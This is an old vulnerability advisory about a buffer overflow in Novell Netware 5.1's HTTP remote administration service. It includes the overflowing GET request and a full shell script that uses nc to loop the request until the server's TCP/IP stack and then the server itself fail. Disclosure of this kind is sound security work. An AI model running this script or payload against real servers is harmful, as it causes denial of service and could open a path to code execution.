COMMAND
Netware
SYSTEMS AFFECTED
Novell Netware 5.1 (server 5.00h, Dec 11, 1999)...
PROBLEM
Michal Zalewski found following. Affected are virtually any
system running on the top of Netware system with http remote
administration (including web caching solutions, BorderManager
firewall and so on)... because there's an buffer overflow in
remote (http, usually on port 8008 or so) administration
protocol for tcp-enabled Netware servers - it might be exploited
by sending request like that:
GET / AAAAAAAAAAAAAAAAAAAAAAAAAAA.......(something between 4 and 8kb)
Connection won't be dropped (that's Netware TCP/IP stack problem
or _feature_), but you'll get an error message on console,
sometimes with stack dump (yes, lovely: 41 41 41 41... ;) There
are two problems with it:
1. Of course, overflow, allowing attacker to execute arbitraty
code on server,
2. Problem with TCP/IP stack; there's no automatic clean-up in
case of application crash. By connecting, sending evil
request, disconnecting and connecting again for some time
(usually few thousand times is enough), whole TCP/IP stack
will be fscked up, causing death of TCP networking (first,
server starts to refuse or immediately drops any connection,
then stops responding network requests), and, eventually,
whole server dies.
There's simple script, which, left for some time, should kill
Netware TCP/IP. Please change $SERVER and $PORT for testing
purposes.
#!/bin/sh
SERVER=127.0.0.1
PORT=8008
WAIT=3
DUZOA=`perl -e '{print "A"x4093}'`
MAX=30
while :; do
ILE=0
while [ $ILE -lt $MAX ]; do
(
(
echo "GET /"
echo $DUZOA
echo
) | nc $SERVER $PORT &
sleep $WAIT
kill -9 $!
) &>/dev/null &
ILE=$[ILE+1]
done
sleep $WAIT
done
SOLUTION
Nothing yet.